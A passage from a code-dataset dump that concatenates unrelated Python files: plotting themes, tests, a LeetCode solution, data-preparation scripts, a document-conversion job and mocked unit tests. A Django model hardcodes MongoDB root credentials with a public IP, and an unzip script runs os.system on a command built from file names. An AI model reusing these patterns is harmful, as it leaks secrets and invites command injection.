\"fontname\": \"Sans-Serif\",\n \"fontsize\": \"12\",\n \"fontcolor\": \"#EEEEEE\",\n \"margin\": \"30\"\n }\n\n theme_node_attrs = {\n \"shape\": \"invis\",\n \"style\": \"rounded,filled\",\n \"fixedsize\": \"true\",\n \"width\": \"1.0\",\n \"height\": \"1.5\",\n \"labelloc\": \"b\",\n \"imagescale\": \"true\",\n \"fontname\": \"Sans-Serif\",\n \"fontsize\": \"13\",\n \"fontcolor\": \"#EEEEEE\",\n \"color\": \"invis\",\n \"fillcolor\": \"invis\"\n }\n\n theme_edge_attrs = {\n \"penwidth\": \"2\",\n \"minlen\": \"2.0\",\n \"color\": \"#EEEEEE\"\n }\n\n self.graph_attrs.update(theme_graph_attrs)\n self.cluster_attrs.update(theme_cluster_attrs)\n self.node_attrs.update(theme_node_attrs)\n self.edge_attrs.update(theme_edge_attrs)\n self.colors = [\"#1C2833\", \"#212F3D\", \"#273746\", \"#2C3E50\", \"#566573\"]\n\n if graph_attr_overrides is not None:\n self.graph_attrs.update(graph_attr_overrides)\n\n if cluster_attr_overrides 
is not None:\n self.cluster_attrs.update(cluster_attr_overrides)\n\n if node_attr_overrides is not None:\n self.node_attrs.update(node_attr_overrides)\n\n if edge_attr_overrides is not None:\n self.edge_attrs.update(edge_attr_overrides)\n\n if color_overrides:\n self.colors = color_overrides","sub_path":"architectures/themes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"538918273","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-intel/egg/tests/ops/test_transformation_ops.py\n# Compiled at: 2018-04-05 20:01:41\n# Size of source mod 2**32: 1420 bytes\nfrom trane.ops.transformation_ops import *\nfrom pandas import DataFrame\nfrom trane.utils.table_meta import TableMeta as TM\nimport numpy as np\ndf = DataFrame({'col': [1, 2, 3, 4, 5]})\nmeta = TM({'tables': [\n {'fields': [\n {'name': 'col', 'type': TM.SUPERTYPE[TM.TYPE_FLOAT], \n 'subtype': TM.TYPE_FLOAT}]}]})\n\ndef test_identity_transformation_op_input_value():\n op = IdentityTransformationOp('col')\n op.op_type_check(meta)\n output = op(df.copy())\n assert np.all(output.values == np.asarray([[1, 2, 3, 4, 5]]).T)\n\n\ndef test_diff_transformation_op_input_value():\n op = DiffTransformationOp('col')\n op.op_type_check(meta)\n output = op(df.copy())\n assert np.all(output.values == np.asarray([[0, 1, 1, 1, 1]]).T)\n\n\ndef test_ObjectFrequencyTransformationOp():\n df = DataFrame([(1.0, 100), (2.0, 70), (3.0, 100),\n (4.0, 70), (5.0, 70)], columns=['id', 'height'])\n op = ObjectFrequencyTransformationOp('height')\n op2 = ObjectFrequencyTransformationOp('id')\n output = op(df.copy())\n output2 = op2(df.copy())\n expected = DataFrame([(1.0, 2), (2.0, 3)], columns=[\n 'id', 'height'])\n expected2 = DataFrame([(1, 100), (1, 70), (1, 100),\n (1, 70), (1, 70)], columns=['id', 'height'])\n assert output.equals(expected)\n assert output2.equals(expected2)","sub_path":"pycfiles/trane-0.1.0-py3.4/test_transformation_ops.cpython-34.py","file_name":"test_transformation_ops.cpython-34.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"143773557","text":"# https://leetcode.com/problems/most-common-word/\n\ndef mostCommonWord(paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n import re\n import collections\n import operator\n def santise(w):\n w = re.sub('[$,.:;?!]', '', w)\n return w.lower().strip(\"'\").strip(\"\\\"\")\n\n #words = paragraph.split(\" \")\n words = re.split('[$.,\\s+]', paragraph)\n print(words)\n banned_words = set([w.lower() for w in banned])\n word_count = {} \n for word in words:\n word = santise(word)\n if word not in banned_words:\n if word != \"\":\n try:\n word_count[word] = word_count[word] + 1\n except KeyError: \n word_count[word] = 1\n \n word_occurance = sorted(word_count.items(), key=operator.itemgetter(1))\n sorted_dict = collections.OrderedDict(word_occurance)\n used_word = word_occurance[-1]\n return used_word[0]\n \n\n\nparagraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\nbanned = [\"hit\"]\nparagraph = \"a, a, a, a, b,b,b,c, c\"\nbanned = [\"a\"]\na = mostCommonWord(paragraph, 
banned)\nprint(a)","sub_path":"most_common_word.py","file_name":"most_common_word.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"209564757","text":"import requests \nimport os\nfrom datetime import datetime \n\nfrom settings import *\n\n\n\n# only unzip filings from current year\n#CURRENT_YEAR = '2019'\n\n# run all years with CURRENT_YEAR = '2'\nCURRENT_YEAR = '2'\n\ndef makedir(directory):\n if not os.path.exists(directory):\n os.makedirs(directory)\n\nif __name__ == '__main__':\n\n infile = open(PAPER_ZIPFILE_MANIFEST, 'r')\n filings = []\n for raw_row in infile:\n row = raw_row.replace(\"\\n\",\"\")\n if row.endswith(\".zip\"):\n print(\"'%s'\" % row)\n filings.append(row)\n\n\n for i, filing in enumerate(filings):\n raw_name = filing.replace(\".zip\", \"\")\n directory_path = RAW_PAPER_DIR + raw_name\n makedir(directory_path)\n\n if CURRENT_YEAR in raw_name:\n\n unzip_cmd = \"unzip -o %s%s -d %s%s/\" % (PAPER_ZIPDIR, filing, RAW_PAPER_DIR, raw_name)\n print(i)\n print(unzip_cmd)\n os.system(unzip_cmd)\n else:\n print(\"Skipping zipfile %s\" % raw_name)\n\n","sub_path":"unzip_paper_filings.py","file_name":"unzip_paper_filings.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"247982282","text":"from django.db import models\nfrom pymongo import MongoClient\nfrom django.db.models.signals import pre_delete,post_save,pre_save\nfrom django.dispatch.dispatcher import receiver\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\n\nuri = \"mongodb://root:root@40.117.234.124:27017/?authSource=admin&authMechanism=SCRAM-SHA-256\"\nclient = MongoClient(uri)\nmydb = client[\"cloudassg2\"]\nmycol = mydb[\"imagemetadata\"]\n\nclass ImageSet(models.Model):\n id = models.AutoField(primary_key=True)\n image = models.ImageField(upload_to='imgset/', null=True, blank=False)\n\ndef getmetadatadict(path):\n retdict = {}\n retdict.update({\"imgpath\":str(path)})\n image = Image.open(path)\n exifdata = image.getexif()\n for tag_id in exifdata:\n tag = TAGS.get(tag_id, tag_id)\n data = exifdata.get(tag_id)\n if isinstance(data, bytes):\n data = data.decode()\n data = str(data)\n tag = str(tag)\n retdict.update({tag:data})\n #print(f\"{tag}: {data}\")\n #print(retdict)\n return retdict\n\n@receiver(post_save, sender=ImageSet)\ndef imageset_save(sender, instance, **kwargs):\n metadict = getmetadatadict(instance.image.path)\n #print(metadict)\n x = mycol.insert_one(metadict)\n\n@receiver(pre_delete, sender=ImageSet)\ndef imageset_delete(sender, instance, **kwargs):\n myquery = { \"imgpath\":str(instance.image.path)}\n mycol.delete_one(myquery) ","sub_path":"imgmeta/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"54218095","text":"from glob import glob\nimport json\nimport parser\n\n\ndef get_top_subreddits(parsed_sentence, relevant_terms):\n ranks = []\n for subreddit_word_count in relevant_terms:\n weight = 0\n name, word_count = subreddit_word_count\n word_count = dict(word_count)\n for word, count in parsed_sentence.items():\n if word in word_count:\n weight += count * word_count[word]\n if weight != 0:\n ranks.append((name, weight))\n ranks.sort(key=lambda tup: tup[1], reverse=True)\n return ranks\n\n\ndef classify(relevant_terms, sentence):\n word_count = 
parser.sentence_to_word_dict(sentence)\n result = get_top_subreddits(word_count, relevant_terms)\n return result\n\nif __name__ == '__main__':\n sentence = 'Teach me how to program Haskell'\n with open('relevantTerms.json') as data_file:\n relevant_terms = json.load(data_file)\n data_file.close()\n classify(relevant_terms, sentence)\n","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37951840","text":"import json\nimport os\nimport shutil\nimport tempfile\nfrom typing import Dict, List, Optional, Union, cast\n\nfrom googleapiclient.discovery import build\nfrom googleapiclient.http import MediaFileUpload\nfrom oauth2client.client import GoogleCredentials\n\nfrom config import get_content_root, get_node_modules_bin\nfrom jobs.base.subprocess_job import SubprocessJob\nfrom jobs.pull.gdoc import pull_gdoc\nfrom util.files import Files, list_files, move_files, temp_dir\nfrom util.gapis import gdrive_service\n\n\nclass Convert(SubprocessJob):\n \"\"\"\n A job that converts files from one format to another.\n\n Delegates convertion the Encoda CLI https://github.com/stencila/encoda\n which should be installed globally within the worker's Docker container.\n \"\"\"\n\n name = \"convert\"\n\n def do( # type: ignore[override]\n self,\n input: Union[str, bytes],\n output: Union[str, List[str]],\n options: Dict[str, Union[str, bool]] = {},\n src: str = \".\",\n dest: str = \".\",\n secrets: Dict = {},\n **kwargs,\n ) -> Files:\n \"\"\"\n Do the conversion.\n\n The signature of this method is similar to that of Encoda's\n `convert` function but with a flatter structure for the options\n aligned to the Encoda CLI.\n\n Allows for multiple outputs and alternative source and desination\n directories (with dictionary of files relative to destination).\n\n input: The path to the input file, or bytes to be sent to stdin.\n output: The path to the output file, a list of outputs files, or\n \"-\" for output stream bytes (mostly when used by other jobs).\n options:\n from: The format to convert from (defaults to ext name of input)\n to: The format to convert to (defaults to ext name of output)\n theme: Name of the theme to use for outputs\n src: The source storage directory e.g. `snapshots/42/T5kdbaJ8ZmNTXuuv4XJnsi/`\n defaulting to the current working directory\n dest: The destination storage directory e.g. 
`content/3212/`\n defaulting to the current working directory\n \"\"\"\n assert (isinstance(input, str) or isinstance(input, bytes)) and len(\n input\n ) > 0, \"input must be a non-empty string or bytes\"\n assert isinstance(output, str) or isinstance(\n output, list\n ), \"output must be a string or list of strings\"\n assert isinstance(options, dict), \"options must be a dictionary\"\n\n # Rewrite output path(s) to a temporary directory\n temp = None\n outputs = output if isinstance(output, list) else [output]\n for index, output in enumerate(outputs):\n if output != \"-\":\n if temp is None:\n temp = temp_dir()\n outputs[index] = os.path.join(temp, output)\n\n # Generate arguments to Encoda and call it\n args = encoda_args(input, outputs, options)\n result = super().do(args, input=input if isinstance(input, bytes) else None)\n\n # If the output is a stream then just return the bytes\n if len(outputs) == 1 and outputs[0] == \"-\":\n return result\n\n assert isinstance(temp, str)\n\n # For some conversion targets it is necessary to also create a source.\n source: Optional[Dict] = None\n if (\n len(outputs) == 1\n and isinstance(outputs[0], str)\n and outputs[0].endswith(\".gdoc\")\n ):\n source = create_gdoc_source(output=outputs[0], secrets=secrets)\n\n # Get list of created files and add source if needed\n files = list_files(temp)\n filenames = list(files.keys())\n if len(filenames) > 0 and source:\n files[filenames[0]][\"source\"] = source\n\n # Move all files to destination.\n dest_parts = os.path.normpath(dest).split(\"/\")\n if dest_parts[0] == \"content\":\n dest_root = get_content_root()\n else:\n dest_root = \".\"\n move_files(temp, dest=os.path.join(dest_root, *dest_parts[1:]))\n\n return files\n\n\ndef encoda_args( # type: ignore\n input: Union[str, bytes], outputs: List[str], options: Dict[str, Union[str, bool]],\n) -> List[str]:\n \"\"\"\n Create an array of Encoda arguments based on job inputs, outputs and options.\n \"\"\"\n args = [\n get_node_modules_bin(\"encoda\"),\n \"convert\",\n \"-\" if isinstance(input, bytes) else input,\n ] + outputs\n\n # Ensure XML files with the `.jats.xml` extension are treated as\n # JATS format (otherwise they are treated as plain XML)\n if isinstance(input, str) and input.endswith(\".jats.xml\"):\n options[\"from\"] = \"jats\"\n\n for name, value in options.items():\n # Determine --from option\n # Encoda currently does not allow for mimetypes in the `from` option.\n # This replaces some mimetypes with codec names for formats that are\n # not easily identifiable from their extension. 
This means that for other\n # files, the file extension will be used to determine the format (which\n # works in most cases).\n if name == \"from\" and isinstance(value, str):\n value = {\n \"application/jats+xml\": \"jats\",\n \"application/vnd.google-apps.document\": \"gdoc\",\n }.get(value, value)\n # If the value has a slash in it, assume it's still a mimetype\n # and skip\n if isinstance(value, str) and \"/\" in value:\n continue\n\n # Transform boolean values\n if value is False:\n value = \"false\"\n if value is True:\n value = \"true\"\n\n args.append(\"--{}={}\".format(name, value))\n return args\n\n\ndef create_gdoc_source(output: str, secrets: Dict) -> Dict[str, str]:\n \"\"\"\n Create a GoogleDoc from input and return its id.\n\n When encoding to `gdoc`, Encoda actually creates a `docx` file which\n this function then uploads to Google Drive and has it converted\n to a Google Doc there (because it is not possible to upload the\n Google Doc JSON content directly). Finally, we fetch the Google Doc\n JSON and save it to the output file.\n \"\"\"\n # Create a temporary docx to upload\n # Although it is already a docx, for this request to succeed it\n # needs to have the right extension.\n docx = output + \".docx\"\n shutil.copyfile(output, docx)\n\n # Create the Google Doc as a new source\n gdoc = (\n gdrive_service(secrets)\n .files()\n .create(\n body={\n \"name\": os.path.basename(output),\n \"mimeType\": \"application/vnd.google-apps.document\",\n },\n media_body=MediaFileUpload(docx),\n media_mime_type=\"application/vnd.openxmlformats-officedocument.wordprocessingml.document\",\n )\n .execute()\n )\n source = dict(type_name=\"GoogleDocs\", doc_id=gdoc[\"id\"])\n\n # Fetch the Google Doc JSON\n pull_gdoc(source=source, path=output, secrets=secrets)\n\n # Remove the temporary docx\n os.unlink(docx)\n\n return source\n","sub_path":"worker/jobs/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107529006","text":"#!/usr/bin/env python3\n\n\"\"\"\nPrepare Tacotron training data\n\"\"\"\n\nimport csv\nimport os\nimport random\n\nfrom sentence import encode_sentence\n\nVALIDATION_THRESHOLD = 0.1\n\ndef prepare_training_data(input_filename, training_output_filename, validation_output_filename, wav_directory=None):\n with open(input_filename, 'r') as infile:\n with open(training_output_filename, 'w') as training_outfile:\n with open(validation_output_filename, 'w') as validation_outfile:\n reader = csv.reader(infile, delimiter='|', quoting=csv.QUOTE_NONE)\n training_writer = csv.writer(training_outfile, delimiter='|', quoting=csv.QUOTE_NONE, quotechar='')\n validation_writer = csv.writer(validation_outfile, delimiter='|', quoting=csv.QUOTE_NONE, quotechar='')\n prepare_training_csvs(reader, training_writer, validation_writer, wav_directory)\n\ndef prepare_training_csvs(csv_reader, training_csv_writer, validation_csv_writer, wav_directory=None):\n \"\"\"\n Read LJSpeech metadata.csv, filter out things we can't parse, then save the\n good (passing) examples into a new file.\n \"\"\"\n success_count = 0\n failure_count = 0\n training_count = 0\n validation_count = 0\n\n for row in csv_reader:\n if len(row) != 3:\n failure_count += 1\n print('Problem row: {}'.format(row))\n continue\n wav = row[0]\n original_sentence = row[1]\n expanded_sentence = row[2]\n encoded_sentence = encode_sentence(expanded_sentence)\n\n passes = True\n for token in 
encoded_sentence:\n if not isinstance(token, int):\n # If we can't encode the entire sentence, don't use it.\n # We can improve our sentence tokenizing to get a bettter pass rate,\n # but we're already in the long tail zone of deminishing returns.\n passes = False\n break\n\n if not passes:\n failure_count += 1\n continue\n\n training = True\n if random.random() < VALIDATION_THRESHOLD:\n training = False\n\n if not wav.endswith('.wav'):\n # Tacotron expects filenames. LJS does not include extensions.\n wav += '.wav'\n\n if wav_directory:\n wav = os.path.join(wav_directory, wav)\n\n try:\n # Here we only save two of the three columns back, because that's what Tacotron expects\n if training:\n training_csv_writer.writerow([wav, expanded_sentence])\n training_count += 1\n else:\n validation_csv_writer.writerow([wav, expanded_sentence])\n validation_count += 1\n except:\n print('Failure: {}'.format(row))\n success_count +=1\n\n print('Success count: {}'.format(success_count))\n print('Failure count: {}'.format(failure_count))\n print('Training count: {}'.format(training_count))\n print('Validation count: {}'.format(validation_count))\n\n validation_percent = validation_count / (validation_count + training_count)\n print('Validation percent: {}'.format(validation_percent))\n\nif __name__ == '__main__':\n input_file = '/home/bt/datasets/LJSpeech-1.1/metadata.csv'\n training_file = '/home/bt/datasets/LJSpeech-1.1/filtered_training.csv'\n validation_file = '/home/bt/datasets/LJSpeech-1.1/filtered_validation.csv'\n wav_directory = '/home/bt/datasets/LJSpeech-1.1/wavs'\n\n prepare_training_data(input_file, training_file, validation_file, wav_directory)\n\n","sub_path":"src/tacotron_training.py","file_name":"tacotron_training.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"648124741","text":"\"\"\"\nProvide a graphical user interface (GUI) to the user configuration file (``cea.config``).\n\"\"\"\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport json\nimport htmlPy\nimport cea.config\n\n__author__ = \"Daren Thomas\"\n__copyright__ = \"Copyright 2017, Architecture and Building Systems - ETH Zurich\"\n__credits__ = [\"Daren Thomas\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = \"Daren Thomas\"\n__email__ = \"cea@arch.ethz.ch\"\n__status__ = \"Production\"\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n\nclass Backend(htmlPy.Object):\n \"\"\"Contains the backend functions, callable from the GUI.\"\"\"\n def __init__(self, config):\n super(Backend, self).__init__()\n # Initialize the class here, if required.\n self.config = config\n\n @htmlPy.Slot(str, str, result=None)\n def save_section(self, section_name, json_data):\n print(\"Saving section: %s\" % section_name)\n print(json_data)\n values = json.loads(json_data)\n print(values)\n for key, value in values.items():\n print(\"Setting %s to %s\" % (key, value))\n self.config.sections[section_name].parameters[key].set(value)\n self.config.save()\n return\n\n @htmlPy.Slot(str, result=str)\n def get_parameters(self, section_name):\n result = json.dumps({p.name: p.typename for p in self.config.sections[section_name].parameters.values()})\n return result\n\n @htmlPy.Slot(str, result=str)\n def get_default_parameters(self, section_name):\n default_config = cea.config.Configuration(cea.config.DEFAULT_CONFIG)\n result = json.dumps({p.name: {'type': p.typename,\n 'value': p.get(),\n 
'raw': p.get_raw()}\n for p in default_config.sections[section_name].parameters.values()})\n return result\n\n\ndef main(config):\n \"\"\"\n Start up the editor to edit the configuration file.\n\n :param config: the configuration file wrapper object\n :type config: cea.config.Configuration\n :return:\n \"\"\"\n app = htmlPy.AppGUI(title=u\"CEA Configuration File Editor\", maximized=False, developer_mode=True)\n\n app.template_path = os.path.join(BASE_DIR, 'templates')\n app.static_path = os.path.join(BASE_DIR, 'static')\n\n app.template = (\"config_editor.html\", {\"config\": config})\n app.bind(Backend(config), variable_name='backend')\n app.start()\n\n\nif __name__ == '__main__':\n main(cea.config.Configuration())\n","sub_path":"legacy/config_editor/config_editor.py","file_name":"config_editor.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"589066903","text":"# Converts PDF to image to find location data\n\nimport os, glob\nfrom PIL import Image\n\nfrom pdf2image import convert_from_path\n\n\nfolder_path = 'C:/Users/Richard/Projects/OCR Invoice Processor/Convert'\ncount = 1\n\nfor filename in glob.glob(os.path.join(folder_path, '*.pdf')):\n pages = convert_from_path(filename)\n for page in pages:\n page.save('C:/Users/Richard/Projects/OCR Invoice Processor/temp/img' + str(count) + '.png', 'PNG')\n count += 1\n image = Image.open('temp.png')\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"226091052","text":"#divide and conquer\r\ndef nuts_and_bolts(nuts, bolts):\r\n nuts.sort()\r\n bolts.sort()\r\n stopSign = False\r\n i = 0\r\n j = 0\r\n while not stopSign and i < len(nuts) and j < len(bolts):\r\n if nuts[i] == bolts[j]:\r\n stopSign = True\r\n elif nuts[i] < bolts[j]:\r\n i += 1\r\n else:\r\n j += 1\r\n return stopSign\r\n\r\ndef nuts_and_bolts(nuts, bolts):\r\n if len(nuts) >= 1 and len(bolts) >= 1:\r\n nuts.sort() # Big-O(nlog(n))\r\n bolts.sort() # Big-O(nlog(n))\r\n mid = nuts[0]\r\n nutsLess = []\r\n nutsMore = []\r\n boltsLess = []\r\n boltsMore = []\r\n for i in range(1, len(nuts)): #Big-O(n)\r\n if nuts[i] > mid:\r\n nutsMore.append(nuts[i])\r\n else:\r\n nutsLess.append(nuts[i])\r\n for i in range(0, len(bolts)):\r\n if bolts[i] > mid:\r\n boltsMore.append(bolts[i])\r\n elif bolts[i] < mid:\r\n boltsLess.append(bolts[i])\r\n else:\r\n print(str(mid) + \"matches\" + str(bolts[i]))\r\n nuts_and_bolts(nutsMore, boltsMore)\r\n nuts_and_bolts(nutsLess, boltsLess)\r\n\r\nnuts = [1, 2, 3, 4, 5, 6, 7, 8]\r\nbolts = [7, 6, 5, 4, 3, 2, 1, 9, 10]\r\nnuts_and_bolts(nuts, bolts)\r\n","sub_path":"FIT5211Week4Practice.py","file_name":"FIT5211Week4Practice.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37664860","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\n\ndef estimate_coefficients(x, y):\n # size of the dataset OR number of observations/points\n n = np.size(x)\n\n # mean of x and y\n # Since we are using numpy just calling mean on numpy is sufficient\n mean_x, mean_y = np.mean(x), np.mean(y)\n\n # calculating cross-deviation and deviation about x\n SS_xy = np.sum(y*x) - n*mean_y*mean_x\n SS_xx = np.sum(x*x) - n*mean_x*mean_x\n\n # calculating regression coefficients\n b_1 = 
SS_xy / SS_xx\n b_0 = mean_y - b_1*mean_x\n\n return(b_0, b_1)\n\n # x,y are the location of points on graph\n # color of the points change it to red blue orange play around\n\n\n\ndef plot_regression_line(x, y, b, xlabel, ylabel):\n # plotting the points as per dataset on a graph\n plt.scatter(x, y, color = \"m\",marker = \"o\", s = 30)\n\n # predicted response vector\n y_pred = b[0] + b[1]*x\n\n # plotting the regression line\n plt.plot(x, y_pred, color = \"g\")\n\n # putting labels for x and y axis\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n\n # function to show plotted graph\n plt.show()\n\n\ndef predict_with_intercept(X, y):\n # Note the difference in argument order\n X = sm.add_constant(X) ## let's add an intercept (beta_0) to our model\n\n # Note the difference in argument order\n model = sm.OLS(y, X).fit() ## sm.OLS(output, input)\n predictions = model.predict(X)\n print(\"Predictions: \")\n print(predictions[0:5])\n\n # Print out the statistics\n print(model.summary())\n\n\n\ndef main(X, Y):\n df = pd.read_csv('../data/cleaned-outliers-auto-mpg.csv')\n\n x = df[X]\n y = df[Y] # Y is the variable we are trying to predict\n\n # estimating coefficients\n b = estimate_coefficients(x, y)\n print(\"Estimated coefficients:\\nb_0 = {} \\nb_1 = {}\".format(b[0], b[1]))\n\n predict_with_intercept(x, y)\n\n\nif __name__ == \"__main__\":\n main(['displacement', 'USA'], 'mpg')\n","sub_path":"task2/RegressionModel.py","file_name":"RegressionModel.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"344829623","text":"#-*- using:utf-8 -*-\nimport time\n\n\nif __name__ == '__main__':\n start = time.time()\n\n for i in range(100):\n print(\"a\")\n\n elapsed_time = time.time() - start\n print((\"elapsed_time:{0}\".format(elapsed_time)) + \"[sec]\")","sub_path":"mytest.py","file_name":"mytest.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"556715020","text":"# Things you should be able to do.\n\n# Write a function that takes a list and returns a new list with only the odd numbers.\ndef all_odd(some_list):\n odd_nums = []\n for number in some_list:\n if number % 2 != 0:\n odd_nums.append(number)\n return odd_nums\n\n# Write a function that takes a list and returns a new list with only the even numbers.\ndef all_even(some_list):\n even_nums = []\n for number in some_list:\n if number % 2 == 0:\n even_nums.append(number)\n return even_nums\n\n# Write a function that takes a list of strings and a new list with all strings of length 4 or greater.\ndef long_words(word_list):\n four_plus = []\n for word in word_list:\n if len(word) >= 4:\n four_plus.append(word)\n return four_plus\n\n# Write a function that finds the smallest element in a list of integers and returns it.\ndef smallest(some_list):\n smallest = some_list[0]\n for number in some_list:\n if number < smallest:\n smallest = number\n return smallest\n\n# Write a function that finds the largest element in a list of integers and returns it.\ndef largest(some_list):\n largest = some_list[0]\n for number in some_list:\n if number > largest:\n largest = number\n return largest\n\n# Write a function that takes a list of numbers and returns a new list of all those numbers divided by two.\ndef halvesies(some_list):\n halves = []\n for number in some_list:\n half = number / 2.0\n halves.append(half)\n return halves\n\n# Write a function that takes a list of 
words and returns a list of all the lengths of those words.\ndef word_lengths(word_list):\n word_lengths = []\n for word in word_list:\n length = len(word)\n word_lengths.append(length)\n return word_lengths\n\n# Write a function (using iteration) that sums all the numbers in a list.\ndef sum_numbers(numbers):\n total_sum = 0\n for number in numbers:\n total_sum += number\n return total_sum\n\n# Write a function that multiplies all the numbers in a list together.\ndef mult_numbers(numbers):\n total_mult = 1\n for number in numbers:\n total_mult *= number\n return total_mult\n\n# Write a function that joins all the strings in a list together (without using the join method) and returns a single string.\ndef join_strings(string_list):\n long_string = \"\"\n for string in string_list:\n long_string = long_string + string\n return long_string\n\n# Write a function that takes a list of integers and returns the average (without using the avg method)\ndef average(numbers):\n list_average = float(sum(numbers)) / len(numbers)\n return list_average","sub_path":"skills1.py","file_name":"skills1.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"524644753","text":"import unittest\nfrom unittest.mock import patch\nfrom hen_class import HenHouse, ErrorTimesOfYear\n\n\nclass TestHenHouse(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n # optional method, may be used to initialize hen_house instance\n cls.hen_house = HenHouse(10)\n\n def test_init_with_less_than_min(self):\n # initialize HenHouse with hens_count less than HenHouse.min_hens_accepted\n # make sure error is raised\n with self.assertRaises(ValueError):\n self.hen_house = HenHouse(1)\n\n def test_season(self):\n # mock the datetime method/attribute which returns month number\n # make sure correct month (\"winter\"/\"spring\" etc.) 
is returned from season method\n # try to return different seasons\n with patch(\"hen_class.HenHouse.season\", \"winter\"):\n self.assertEqual(self.hen_house.season, \"winter\")\n with patch(\"hen_class.HenHouse.season\", \"spring\"):\n self.assertEqual(self.hen_house.season, \"spring\")\n with patch(\"hen_class.HenHouse.season\", \"summer\"):\n self.assertEqual(self.hen_house.season, \"summer\")\n with patch(\"hen_class.HenHouse.season\", \"autumn\"):\n self.assertEqual(self.hen_house.season, \"autumn\")\n\n def test_productivity_index(self):\n # mock the season method return with some correct season\n # make sure _productivity_index returns correct value based on season and HenHouse.hens_productivity attribute\n with patch(\"hen_class.HenHouse.season\", \"winter\"):\n self.assertEqual(self.hen_house._productivity_index(), 0.25)\n with patch(\"hen_class.HenHouse.season\", \"spring\"):\n self.assertEqual(self.hen_house._productivity_index(), 0.75)\n with patch(\"hen_class.HenHouse.season\", \"summer\"):\n self.assertEqual(self.hen_house._productivity_index(), 1)\n with patch(\"hen_class.HenHouse.season\", \"autumn\"):\n self.assertEqual(self.hen_house._productivity_index(), 0.5)\n\n def test_productivity_index_incorrect_season(self):\n # mock the season method return with some incorrect season\n # make sure ErrorTimesOfYear is raised when _productivity_index called\n with patch(\"hen_class.HenHouse.season\", \"\"):\n with self.assertRaises(ErrorTimesOfYear):\n self.hen_house._productivity_index()\n\n def test_get_eggs_daily_in_winter(self):\n # test get_eggs_daily function\n # _productivity_index method or season should be mocked\n with patch(\"hen_class.HenHouse._productivity_index\", return_value=0.25):\n self.assertEqual(self.hen_house.get_eggs_daily(10), 2)\n\n def test_get_max_count_for_soup(self):\n # call get_max_count_for_soup with expected_eggs number and check that correct number is returned\n\n # Note: make sure to mock _productivity_index or season\n # in order not to call datetime.datetime.today().month, since it is going to be dynamic value in the future\n with patch(\"hen_class.HenHouse.season\", \"winter\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(1), 4)\n with patch(\"hen_class.HenHouse.season\", \"spring\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(5), 2)\n with patch(\"hen_class.HenHouse.season\", \"summer\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(8), 2)\n with patch(\"hen_class.HenHouse.season\", \"autumn\"):\n self.assertEqual(self.hen_house.get_max_count_for_soup(3), 4)\n\n def test_get_max_count_for_soup_returns_zero(self):\n # call get_max_count_for_soup with expected_eggs number bigger than get_eggs_daily(self.hen_count)\n # zero should be returned.\n\n # Note: make sure to mock _productivity_index or season\n # in order not to call datetime.datetime.today().month, since it is going to be dynamic value in the future\n with patch(\"hen_class.HenHouse._productivity_index\", return_value=0.5):\n self.assertEqual(self.hen_house.get_max_count_for_soup(10), 0)\n\n def test_food_price(self):\n # mock requests.get and make the result has status_code attr 200 and text to some needed value\n # make sure food-price() return will be of int type\n with patch(\"hen_class.requests.get\") as mocked_request:\n mocked_request.return_value.status_code = 200\n mocked_request.return_value.text = \"6543513511212\"\n self.assertEqual(self.hen_house.food_price(), 2)\n self.assertIsInstance(self.hen_house.food_price(), int)\n\n def 
